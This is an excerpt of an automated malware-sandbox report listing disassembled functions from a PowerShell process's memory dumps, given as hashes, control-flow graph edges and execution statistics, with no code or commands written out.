                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2b336cade960d0bc4173c227ce15d61a404370f7029a6b37c5ff4fea0b8a88d
                                                                  • Instruction ID: 034217f56d8bd7c02ac4a892b08e898a433b445697bf615559b4ac40232a364e
                                                                  • Opcode Fuzzy Hash: b2b336cade960d0bc4173c227ce15d61a404370f7029a6b37c5ff4fea0b8a88d
                                                                  • Instruction Fuzzy Hash: 56F1C330908A4D8FEFA8EF28C8557E977E1FF54310F45426AE85DC7295DB34A881CB82
                                                                  Function 00007FF7C00EE992 Relevance: .5, Instructions: 461COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 166 7ff7c00ee992-7ff7c00ee99f 167 7ff7c00ee9a1-7ff7c00ee9a9 166->167 168 7ff7c00ee9aa-7ff7c00eea77 166->168 167->168 171 7ff7c00eeae3 168->171 172 7ff7c00eea79-7ff7c00eea82 168->172 174 7ff7c00eeae5-7ff7c00eeb0a 171->174 172->171 173 7ff7c00eea84-7ff7c00eea90 172->173 175 7ff7c00eea92-7ff7c00eeaa4 173->175 176 7ff7c00eeac9-7ff7c00eeae1 173->176 180 7ff7c00eeb76 174->180 181 7ff7c00eeb0c-7ff7c00eeb15 174->181 177 7ff7c00eeaa6 175->177 178 7ff7c00eeaa8-7ff7c00eeabb 175->178 176->174 177->178 178->178 182 7ff7c00eeabd-7ff7c00eeac5 178->182 184 7ff7c00eeb78-7ff7c00eeb9d 180->184 181->180 183 7ff7c00eeb17-7ff7c00eeb23 181->183 182->176 185 7ff7c00eeb25-7ff7c00eeb37 183->185 186 7ff7c00eeb5c-7ff7c00eeb74 183->186 191 7ff7c00eeb9f-7ff7c00eeba9 184->191 192 7ff7c00eec0b 184->192 187 7ff7c00eeb3b-7ff7c00eeb4e 185->187 188 7ff7c00eeb39 185->188 186->184 187->187 190 7ff7c00eeb50-7ff7c00eeb58 187->190 188->187 190->186 191->192 194 7ff7c00eebab-7ff7c00eebb8 191->194 193 7ff7c00eec0d-7ff7c00eec3b 192->193 201 7ff7c00eec3d-7ff7c00eec48 193->201 202 7ff7c00eecab 193->202 195 7ff7c00eebf1-7ff7c00eec09 194->195 196 7ff7c00eebba-7ff7c00eebcc 194->196 195->193 198 7ff7c00eebd0-7ff7c00eebe3 196->198 199 7ff7c00eebce 196->199 198->198 200 7ff7c00eebe5-7ff7c00eebed 198->200 199->198 200->195 201->202 203 7ff7c00eec4a-7ff7c00eec58 201->203 204 7ff7c00eecad-7ff7c00eed9a 202->204 205 7ff7c00eec91-7ff7c00eeca9 203->205 206 7ff7c00eec5a-7ff7c00eec6c 203->206 215 7ff7c00eeda2-7ff7c00eedbc 204->215 216 7ff7c00eed9c 204->216 205->204 208 7ff7c00eec70-7ff7c00eec83 206->208 209 7ff7c00eec6e 206->209 208->208 211 7ff7c00eec85-7ff7c00eec8d 208->211 209->208 211->205 219 7ff7c00eedc5-7ff7c00eee04 call 7ff7c00eee20 215->219 216->215 223 7ff7c00eee06 219->223 224 7ff7c00eee0b-7ff7c00eee1f 219->224 223->224
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4683da792218ab94340060c4c35f540238ec69bda5cfdf5324955deeb3d714fe
                                                                  • Instruction ID: c6c0e3eeb6ead11858b21e513338bb480a5e7b42311ce983454b5f4a2857a52e
                                                                  • Opcode Fuzzy Hash: 4683da792218ab94340060c4c35f540238ec69bda5cfdf5324955deeb3d714fe
                                                                  • Instruction Fuzzy Hash: 9BE1D330908A8D8FEBA8EF28C8557E977D1FB54320F55427EE84DC3295DB74A8858BC1
                                                                  Function 00007FF7C00F8580 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 332COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 239abc203d8ead9a732e31528c4cfb1b1bd2794ad351b3ce802d169e9209594b
                                                                  • Instruction ID: 6233f7494593173217abcd96fa7bc22417275de613a7bd43d4f34e3897728094
                                                                  • Opcode Fuzzy Hash: 239abc203d8ead9a732e31528c4cfb1b1bd2794ad351b3ce802d169e9209594b
                                                                  • Instruction Fuzzy Hash: 95B1D7B030E9889FD7098B6DA4143AAFB61FF4632171483EBD1498B55BCB34EA1687C5
                                                                  Function 00007FF7C00F8DC4 Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 08a9b3182593275c60b87fa8dd328983341d6a1f14298d20dfa95e5d6ef2afd7
                                                                  • Instruction ID: 9d6985ecf13e27510c9cfe08faaa0d64ebb0656cca91a3c8ac4bc90584b925f8
                                                                  • Opcode Fuzzy Hash: 08a9b3182593275c60b87fa8dd328983341d6a1f14298d20dfa95e5d6ef2afd7
                                                                  • Instruction Fuzzy Hash: 5E31B23190CA4C8FDB59EF589889BE9BBE0FF56321F04422BD009D3251CB74A455CB91
                                                                  Function 00007FF7C01B9902 Relevance: .5, Instructions: 470COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 85 7ff7c01b9902-7ff7c01b9907 86 7ff7c01b9949-7ff7c01b9997 85->86 87 7ff7c01b9909-7ff7c01b9936 85->87 88 7ff7c01b9c67-7ff7c01b9c95 86->88 89 7ff7c01b999d-7ff7c01b99a7 86->89 87->86 94 7ff7c01b9cb1-7ff7c01b9cb6 88->94 95 7ff7c01b9c97-7ff7c01b9c9d 88->95 90 7ff7c01b99c3-7ff7c01b99d0 89->90 91 7ff7c01b99a9-7ff7c01b99c1 89->91 98 7ff7c01b99d6-7ff7c01b99d9 90->98 99 7ff7c01b9c03-7ff7c01b9c0d 90->99 91->90 100 7ff7c01b9cba-7ff7c01b9cc3 94->100 101 7ff7c01b9cb8 94->101 103 7ff7c01b9c9f-7ff7c01b9cb0 95->103 104 7ff7c01b9cc8-7ff7c01b9d08 95->104 98->99 105 7ff7c01b99df-7ff7c01b99eb 98->105 106 7ff7c01b9c0f-7ff7c01b9c1b 99->106 107 7ff7c01b9c1c-7ff7c01b9c64 99->107 108 7ff7c01b9cc5 100->108 109 7ff7c01b9cc7 100->109 101->100 103->94 105->88 111 7ff7c01b99f1-7ff7c01b99fb 105->111 107->88 108->109 109->104 113 7ff7c01b9a14-7ff7c01b9a19 111->113 114 7ff7c01b99fd-7ff7c01b9a0a 111->114 113->99 118 7ff7c01b9a1f-7ff7c01b9a24 113->118 114->113 120 7ff7c01b9a0c-7ff7c01b9a12 114->120 122 7ff7c01b9a3f 118->122 123 7ff7c01b9a26-7ff7c01b9a3d 118->123 120->113 124 7ff7c01b9a41-7ff7c01b9a43 122->124 123->124 124->99 127 7ff7c01b9a49-7ff7c01b9a4c 124->127 128 7ff7c01b9a73 127->128 129 7ff7c01b9a4e-7ff7c01b9a71 127->129 130 7ff7c01b9a75-7ff7c01b9a77 128->130 129->130 130->99 132 7ff7c01b9a7d-7ff7c01b9a98 130->132 134 7ff7c01b9a9a-7ff7c01b9ac2 132->134 134->99 138 7ff7c01b9ac8-7ff7c01b9ad8 134->138 139 7ff7c01b9ada-7ff7c01b9ae4 138->139 140 7ff7c01b9ae8 138->140 142 7ff7c01b9ae6 139->142 143 7ff7c01b9b04-7ff7c01b9b0f 139->143 141 7ff7c01b9aed-7ff7c01b9afa 140->141 141->143 146 7ff7c01b9afc-7ff7c01b9b02 141->146 142->141 143->134 147 7ff7c01b9b11-7ff7c01b9b22 143->147 146->143 147->140 148 7ff7c01b9b24-7ff7c01b9bb5 147->148 157 7ff7c01b9bd5-7ff7c01b9bd6 148->157 158 7ff7c01b9bb7-7ff7c01b9bd3 148->158 160 7ff7c01b9bde-7ff7c01b9bea 157->160 158->157 162 7ff7c01b9bf2-7ff7c01b9bf7 160->162 163 7ff7c01b9bec-7ff7c01b9bf0 160->163 164 7ff7c01b9bf8-7ff7c01b9c02 162->164 163->164
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1722100195.00007FF7C01B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c01b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6888e3a358d85e541190a171f46235cb433663ec786313f9c7d904b995ff3477
                                                                  • Instruction ID: 4894ed7d312314eb6bbe1aa0737aeeb82159ddfaa45003915f6606b90aeca911
                                                                  • Opcode Fuzzy Hash: 6888e3a358d85e541190a171f46235cb433663ec786313f9c7d904b995ff3477
                                                                  • Instruction Fuzzy Hash: 75E1F671A0CA494FDB94EF28A4556B8FBE1FF59724B9801BAD40DC7292CB25B802C791
                                                                  Function 00007FF7C01B2C95 Relevance: .4, Instructions: 418COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 225 7ff7c01b2c95-7ff7c01b2ccc 226 7ff7c01b2cf9-7ff7c01b2d24 225->226 227 7ff7c01b2cce-7ff7c01b2cd7 225->227 228 7ff7c01b2d2a-7ff7c01b2d34 226->228 229 7ff7c01b2f8c-7ff7c01b304b 226->229 227->226 230 7ff7c01b2d36-7ff7c01b2d43 228->230 231 7ff7c01b2d4d-7ff7c01b2d52 228->231 230->231 236 7ff7c01b2d45-7ff7c01b2d4b 230->236 234 7ff7c01b2f30-7ff7c01b2f3a 231->234 235 7ff7c01b2d58-7ff7c01b2d5b 231->235 237 7ff7c01b2f49-7ff7c01b2f89 234->237 238 7ff7c01b2f3c-7ff7c01b2f48 234->238 239 7ff7c01b2d72 235->239 240 7ff7c01b2d5d-7ff7c01b2d70 235->240 236->231 237->229 244 7ff7c01b2d74-7ff7c01b2d76 239->244 240->244 244->234 245 7ff7c01b2d7c-7ff7c01b2db0 244->245 257 7ff7c01b2db2-7ff7c01b2dc5 245->257 258 7ff7c01b2dc7 245->258 261 7ff7c01b2dc9-7ff7c01b2dcb 257->261 258->261 261->234 262 7ff7c01b2dd1-7ff7c01b2dd9 261->262 262->229 264 7ff7c01b2ddf-7ff7c01b2de9 262->264 265 7ff7c01b2e05-7ff7c01b2e15 264->265 266 7ff7c01b2deb-7ff7c01b2e03 264->266 265->234 270 7ff7c01b2e1b-7ff7c01b2e4c 265->270 266->265 270->234 275 7ff7c01b2e52-7ff7c01b2e7e 270->275 279 7ff7c01b2e80-7ff7c01b2e92 275->279 280 7ff7c01b2ea9 275->280 284 7ff7c01b2e96-7ff7c01b2ea7 279->284 285 7ff7c01b2e94 279->285 281 7ff7c01b2eab-7ff7c01b2ead 280->281 281->234 283 7ff7c01b2eb3-7ff7c01b2ebb 281->283 286 7ff7c01b2ebd-7ff7c01b2ec7 283->286 287 7ff7c01b2ecb 283->287 284->281 285->284 288 7ff7c01b2ec9 286->288 289 7ff7c01b2ee7-7ff7c01b2f06 286->289 292 7ff7c01b2ed0-7ff7c01b2ee5 287->292 288->292 294 7ff7c01b2f10-7ff7c01b2f16 289->294 292->289 295 7ff7c01b2f1d-7ff7c01b2f2f 294->295
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1722100195.00007FF7C01B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c01b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3fe73ed539bc16d8826e0c0529b17f4a2cce7c540f144f0da4108aa56db63925
                                                                  • Instruction ID: 1025f7e0d77d89aa2f2e88552220948a75b3bd5fc29e83dfa855f1991a2f449a
                                                                  • Opcode Fuzzy Hash: 3fe73ed539bc16d8826e0c0529b17f4a2cce7c540f144f0da4108aa56db63925
                                                                  • Instruction Fuzzy Hash: D9D16771A0DA894FE755FF6858552B9FBA0EF06720B4802FED54DCB193DB18A809C3A1
                                                                  Function 00007FF7C01B993D Relevance: .3, Instructions: 308COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 392 7ff7c01b993d-7ff7c01b9944 393 7ff7c01b9946 392->393 394 7ff7c01b9948-7ff7c01b9997 392->394 393->394 395 7ff7c01b9c67-7ff7c01b9c95 394->395 396 7ff7c01b999d-7ff7c01b99a7 394->396 401 7ff7c01b9cb1-7ff7c01b9cb6 395->401 402 7ff7c01b9c97-7ff7c01b9c9d 395->402 397 7ff7c01b99c3-7ff7c01b99d0 396->397 398 7ff7c01b99a9-7ff7c01b99c1 396->398 405 7ff7c01b99d6-7ff7c01b99d9 397->405 406 7ff7c01b9c03-7ff7c01b9c0d 397->406 398->397 407 7ff7c01b9cba-7ff7c01b9cc3 401->407 408 7ff7c01b9cb8 401->408 410 7ff7c01b9c9f-7ff7c01b9cb0 402->410 411 7ff7c01b9cc8-7ff7c01b9d08 402->411 405->406 412 7ff7c01b99df-7ff7c01b99eb 405->412 413 7ff7c01b9c0f-7ff7c01b9c1b 406->413 414 7ff7c01b9c1c-7ff7c01b9c64 406->414 415 7ff7c01b9cc5 407->415 416 7ff7c01b9cc7 407->416 408->407 410->401 412->395 418 7ff7c01b99f1-7ff7c01b99fb 412->418 414->395 415->416 416->411 420 7ff7c01b9a14-7ff7c01b9a19 418->420 421 7ff7c01b99fd-7ff7c01b9a0a 418->421 420->406 425 7ff7c01b9a1f-7ff7c01b9a24 420->425 421->420 427 7ff7c01b9a0c-7ff7c01b9a12 421->427 429 7ff7c01b9a3f 425->429 430 7ff7c01b9a26-7ff7c01b9a3d 425->430 427->420 431 7ff7c01b9a41-7ff7c01b9a43 429->431 430->431 431->406 434 7ff7c01b9a49-7ff7c01b9a4c 431->434 435 7ff7c01b9a73 434->435 436 7ff7c01b9a4e-7ff7c01b9a71 434->436 437 7ff7c01b9a75-7ff7c01b9a77 435->437 436->437 437->406 439 7ff7c01b9a7d-7ff7c01b9a98 437->439 441 7ff7c01b9a9a-7ff7c01b9ac2 439->441 441->406 445 7ff7c01b9ac8-7ff7c01b9ad8 441->445 446 7ff7c01b9ada-7ff7c01b9ae4 445->446 447 7ff7c01b9ae8 445->447 449 7ff7c01b9ae6 446->449 450 7ff7c01b9b04-7ff7c01b9b0f 446->450 448 7ff7c01b9aed-7ff7c01b9afa 447->448 448->450 453 7ff7c01b9afc-7ff7c01b9b02 448->453 449->448 450->441 454 7ff7c01b9b11-7ff7c01b9b22 450->454 453->450 454->447 455 7ff7c01b9b24-7ff7c01b9bb5 454->455 464 7ff7c01b9bd5-7ff7c01b9bd6 455->464 465 7ff7c01b9bb7-7ff7c01b9bd3 455->465 467 7ff7c01b9bde-7ff7c01b9bea 464->467 465->464 469 7ff7c01b9bf2-7ff7c01b9bf7 467->469 470 7ff7c01b9bec-7ff7c01b9bf0 467->470 471 7ff7c01b9bf8-7ff7c01b9c02 469->471 470->471
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1722100195.00007FF7C01B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c01b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be4f081900250840ecbe8b9f6af67b469bfe8fa9b22d61a38fa9300197b43fbf
                                                                  • Instruction ID: efc7294427709d42b19e074cf517be2b362ad68c68d787adf03f8b75ad99be41
                                                                  • Opcode Fuzzy Hash: be4f081900250840ecbe8b9f6af67b469bfe8fa9b22d61a38fa9300197b43fbf
                                                                  • Instruction Fuzzy Hash: 28A1D371A0CA4A4FD794EF28A4546B8F7E1FF59724B9401BAD80DC7292CB24BC42C791
                                                                  Function 00007FF7C01B2CE1 Relevance: .2, Instructions: 245COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 473 7ff7c01b2ce1-7ff7c01b2d24 474 7ff7c01b2d2a-7ff7c01b2d34 473->474 475 7ff7c01b2f8c-7ff7c01b304b 473->475 476 7ff7c01b2d36-7ff7c01b2d43 474->476 477 7ff7c01b2d4d-7ff7c01b2d52 474->477 476->477 482 7ff7c01b2d45-7ff7c01b2d4b 476->482 480 7ff7c01b2f30-7ff7c01b2f3a 477->480 481 7ff7c01b2d58-7ff7c01b2d5b 477->481 483 7ff7c01b2f49-7ff7c01b2f89 480->483 484 7ff7c01b2f3c-7ff7c01b2f48 480->484 485 7ff7c01b2d72 481->485 486 7ff7c01b2d5d-7ff7c01b2d70 481->486 482->477 483->475 490 7ff7c01b2d74-7ff7c01b2d76 485->490 486->490 490->480 491 7ff7c01b2d7c-7ff7c01b2db0 490->491 503 7ff7c01b2db2-7ff7c01b2dc5 491->503 504 7ff7c01b2dc7 491->504 507 7ff7c01b2dc9-7ff7c01b2dcb 503->507 504->507 507->480 508 7ff7c01b2dd1-7ff7c01b2dd9 507->508 508->475 510 7ff7c01b2ddf-7ff7c01b2de9 508->510 511 7ff7c01b2e05-7ff7c01b2e15 510->511 512 7ff7c01b2deb-7ff7c01b2e03 510->512 511->480 516 7ff7c01b2e1b-7ff7c01b2e4c 511->516 512->511 516->480 521 7ff7c01b2e52-7ff7c01b2e7e 516->521 525 7ff7c01b2e80-7ff7c01b2e92 521->525 526 7ff7c01b2ea9 521->526 530 7ff7c01b2e96-7ff7c01b2ea7 525->530 531 7ff7c01b2e94 525->531 527 7ff7c01b2eab-7ff7c01b2ead 526->527 527->480 529 7ff7c01b2eb3-7ff7c01b2ebb 527->529 532 7ff7c01b2ebd-7ff7c01b2ec7 529->532 533 7ff7c01b2ecb 529->533 530->527 531->530 534 7ff7c01b2ec9 532->534 535 7ff7c01b2ee7-7ff7c01b2f16 532->535 538 7ff7c01b2ed0-7ff7c01b2ee5 533->538 534->538 541 7ff7c01b2f1d-7ff7c01b2f2f 535->541 538->535
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1722100195.00007FF7C01B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c01b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae5be13df7cfd58a5544e69d9168aa3cc55a109dfd6749e86c4ba9cb15f0787c
                                                                  • Instruction ID: 6f6aa01b0b18eefaeef7374a8a42105168e710289c423736a72a4ca970f19c5e
                                                                  • Opcode Fuzzy Hash: ae5be13df7cfd58a5544e69d9168aa3cc55a109dfd6749e86c4ba9cb15f0787c
                                                                  • Instruction Fuzzy Hash: E68107A1E1DA864FE795EF6854552BCFB91EF05720B9801BEC54DCB2C3CB18BC0987A1

                                                                  Non-executed Functions

                                                                  Function 00007FF7C00F14C5 Relevance: 3.0, Strings: 2, Instructions: 454COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .N_^$/N_^
                                                                  • API String ID: 0-1959839383
                                                                  • Opcode ID: 1e0a25088c40200627d62ab071e7ea0e8fa94db364fd9899974f10d69ec4dbbc
                                                                  • Instruction ID: e30ae7e7709a8a4799ec5a102524c174599e1e92f7bd4954f9cfaa6270beac82
                                                                  • Opcode Fuzzy Hash: 1e0a25088c40200627d62ab071e7ea0e8fa94db364fd9899974f10d69ec4dbbc
                                                                  • Instruction Fuzzy Hash: 6CD1B017A09FA64BD70277BDBC651E96F60CF813B5B0846BBD2C8CD0979D0460CA83E5
                                                                  Function 00007FF7C00EE068 Relevance: .5, Instructions: 462COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 10d2469cae3835e8a164f584c8b35b72d036c93691e25636f2d6bcc4a18ae5d1
                                                                  • Instruction ID: 6c1bba227d2599feeab60909b53ee22eac4c82efe2d3c656a467080640eea797
                                                                  • Opcode Fuzzy Hash: 10d2469cae3835e8a164f584c8b35b72d036c93691e25636f2d6bcc4a18ae5d1
                                                                  • Instruction Fuzzy Hash: 31E1E13190DA8D8FEB54EF2898553E97BE0FF45320F05427AE48DC7297DB34A9858782
                                                                  Function 00007FF7C00E3F55 Relevance: .2, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce211021714da2aa438e049da2d0a1487b7550cb474d1a2d4be8c3829eba5079
                                                                  • Instruction ID: 538c0c3f1cb2965fe29478e030727b11d971d3f13370da34389b399c70b4ba9c
                                                                  • Opcode Fuzzy Hash: ce211021714da2aa438e049da2d0a1487b7550cb474d1a2d4be8c3829eba5079
                                                                  • Instruction Fuzzy Hash: 9351726290E7C65FE7065B78A8612E97F60DF1327470B42F3C498CF5A3D918789A83A1
                                                                  Function 00007FF7C00E4C0A Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae7d47a53239e80fb5e1b15f01cfcd07df9d1dca69f16f38db220b0f1f5bc6af
                                                                  • Instruction ID: cc520bd3d534d243fde8ec79264191f2220b0b8a57df3b8ad53b2c3f90aea1f5
                                                                  • Opcode Fuzzy Hash: ae7d47a53239e80fb5e1b15f01cfcd07df9d1dca69f16f38db220b0f1f5bc6af
                                                                  • Instruction Fuzzy Hash: 9331D65370AB922FD702277D68A42D1BB60EE432BA30642F3C698D7453D918345F86E5
                                                                  Function 00007FF7C00E95FA Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1721277599.00007FF7C00E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff7c00e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 310fe72893490dffb1da835d6a9e4295ab30eb332a99c0ad3ab2eb668cd87c4e
                                                                  • Instruction ID: 48c28e5d95400f5e8ba79ad4306205907115dbb7937d25cf024031f9757f8747
                                                                  • Opcode Fuzzy Hash: 310fe72893490dffb1da835d6a9e4295ab30eb332a99c0ad3ab2eb668cd87c4e
                                                                  • Instruction Fuzzy Hash: E5318BA560DF829FE3025B3958762C2BFA0EF0326834A00F7C0E5CB493DA247156C7E5

                                                                  Execution Graph

                                                                  Execution Coverage:3.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 8895 7ff7c0106c34 8896 7ff7c0106c3d LoadLibraryExW 8895->8896 8898 7ff7c0106ced 8896->8898

                                                                  Executed Functions

                                                                  Function 00007FF7C01C09F2 Relevance: 1.6, Strings: 1, Instructions: 399COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1874612537.00007FF7C01C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff7c01c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 1A_L
                                                                  • API String ID: 0-1522723599
                                                                  • Opcode ID: 6308804e7e3aa9a76eff7c970614306c2814ee5f4e6e4434e77ecdc940e44225
                                                                  • Instruction ID: 7704449259702653534c6518a7fa34f4eb9ecd7f4fcdeede095fbbd64af36f2a
                                                                  • Opcode Fuzzy Hash: 6308804e7e3aa9a76eff7c970614306c2814ee5f4e6e4434e77ecdc940e44225
                                                                  • Instruction Fuzzy Hash: A0C1163070DB854FEB8AEB2C9854968BBE1EF5671074902EEC449CB2A3DA15FC46C7D1
                                                                  Function 00007FF7C0106C34 Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1873465679.00007FF7C00F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C00F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff7c00f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 429820901a067d1d83a6b4478a9b50da525c5548eac40a1b8ed193b5fe7db365
                                                                  • Instruction ID: cad63a47089d978e36e5b9952b2e48795931c946bfc25b9bdca7e44d56f805cb
                                                                  • Opcode Fuzzy Hash: 429820901a067d1d83a6b4478a9b50da525c5548eac40a1b8ed193b5fe7db365
                                                                  • Instruction Fuzzy Hash: 5E31D07190CA5C8FDB19DF689849BE9BBE0FF56320F04822BD049D3251CB74A455CB91
                                                                  Function 00007FF7C01C0A2B Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1874612537.00007FF7C01C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff7c01c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 1A_L
                                                                  • API String ID: 0-1522723599
                                                                  • Opcode ID: 52cd00d10eabfc51054d30c494aca69c5bfd6ea9c67e21077040b6f1b473392e
                                                                  • Instruction ID: 4983c3e2f670a9e4d072b99e2349a306a4a9f98198b139c48b31d85e30a04dae
                                                                  • Opcode Fuzzy Hash: 52cd00d10eabfc51054d30c494aca69c5bfd6ea9c67e21077040b6f1b473392e
                                                                  • Instruction Fuzzy Hash: 5971F63070DA498FDB8AEF2C9455939BBE1EF6A71475402AEC449C76A2CA21FC46C7C1
                                                                  Function 00007FF7C01C3413 Relevance: .4, Instructions: 402COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
